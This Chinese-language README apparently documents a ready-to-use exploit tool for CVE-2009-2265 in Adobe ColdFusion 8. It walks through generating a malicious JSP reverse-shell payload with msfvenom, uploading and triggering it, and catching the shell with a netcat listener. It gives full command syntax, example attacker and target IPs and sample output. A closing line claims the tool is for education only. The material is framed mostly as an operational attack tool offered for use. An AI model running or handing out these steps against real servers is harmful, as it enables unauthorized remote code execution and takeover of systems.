该漏洞利用针对 Adobe ColdFusion 8 中的一个已知漏洞(CVE-2009-2265)。它通过上传恶意 JSP 载荷来建立反向 shell 连接,从而实现远程命令执行 (RCE)。
msfvenom 生成 JSP 载荷。要使用此漏洞利用,您需要具备以下条件:
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
-l <LHOST>:本地攻击者 IP(例如 10.10.16.5)。-p <LPORT>:本地攻击者用于反向 shell 的端口(例如 9001)。-r <RHOST>:远程目标 IP(例如 10.10.10.11)。-q <RPORT>:远程目标运行 ColdFusion 的端口(例如 8500)。./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
在攻击者机器上启动监听器:
nc -lnvp 9001
使用适当的参数运行漏洞利用。
执行后,载荷将回连到您的监听器。
生成载荷:
msfvenom 生成恶意的 JSP 载荷。上传载荷:
触发载荷:
建立反向 shell:
msfvenom:用于生成载荷。curl:用于文件上传和触发载荷。nc (Netcat):用于监听反向 shell 连接。[+] 正在生成 JSP 反向 shell 载荷...
[+] 载荷已保存为 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'。
[+] 正在将载荷上传至目标...
[+] 服务器响应:
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] 正在等待 Netcat 监听器在端口 9001 上启动...
[+] 检测到 Netcat 监听器已在端口 9001 上运行!
[+] 正在尝试触发载荷...
[+] 载荷已成功触发。请检查您的监听器以获取反向 shell。
[+] 正在清理本地文件...
[+] 完成!
此脚本仅供教育目的使用。请仅用于您拥有或已获得明确授权的系统。未经授权在您不拥有所有权的系统上使用此漏洞利用是非法的且不道德的。
由 [0xDTC] 开发。